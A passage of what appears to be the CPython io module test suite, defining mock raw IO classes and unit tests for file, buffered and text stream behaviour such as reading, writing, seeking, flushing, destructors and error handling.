self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
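        # Roughly, the default RawIOBase.read(n) behaves like this simplified
        # sketch (the real implementation also dispatches to readall() when n
        # is negative or None):
        #
        #     buf = bytearray(n)
        #     got = self.readinto(buf)
        #     return None if got is None else bytes(buf[:got])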
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
